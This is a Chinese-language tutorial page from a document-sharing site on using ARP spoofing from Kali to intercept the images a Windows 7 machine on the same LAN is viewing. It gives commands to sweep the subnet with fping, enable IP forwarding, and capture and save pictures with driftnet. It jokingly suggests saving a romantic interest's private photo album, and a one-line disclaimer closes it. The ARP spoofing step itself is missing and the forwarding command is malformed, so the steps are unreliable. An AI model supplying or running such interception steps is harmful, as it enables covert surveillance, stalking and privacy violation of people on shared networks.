操作指导书使用ARP欺骗获取局域网内电脑正在浏览的图片.doc
文本预览下载声明
获取局域网目标的图片
1、环境需求
渗透环境:kali
目标环境:win7(win10可能不成功,win8留给大家自己尝试)
2、开始实验
(1)打开一个终端,扫描局域网正在连接的IP
命令:fping -asg 192.168.0.1/24(具体要看本机ip地址,根据局域网环境选择0段、1段或是其他)
图中192.168.0.1 很明显是网关
正在连接的主机,110和114
(2)开启转发命令
echo 1 /proc/sys/net/ipv4/ip_forward //1状态,目标对象的网络数据都要经过本机网卡转发
查看cat /proc/sys/net/ipv4/ip_forward?返回1 说明开启了
在终端中打开一个新标签
此时确认目标对象依然能正常上网
(3)用命令获取目标对象上网图片
driftnet -i eth0
可以看到目标对象很可能正在京东上网购,是不是有种小工具有大作用的意思!
(4)用Ctrl+C/Z 终止攻击
(5)细心的同志可能会发现图片只能看,好像不能操作,比如保存下来。如果目标对象是你心仪的她,正在看自己qq空间的私密相册,那么很可能就有保存价值啦。
在kali当中要学会使用帮助命令
各种参数的释义,找到我们需要的保存参数。
driftnet -d /tmp //用-d参数,保存在tmp目录下
(5)over!
其他参数,请大家自己操作
3、小结
本实验在win10和win7上分别试过,win7成功截取到图片,win10没成功,原因不明。
4、郑重声明
本教程只做教学及学习使用,请大家切勿随意乱用,以免造成意外后果,所有后果大家自行负责。
显示全部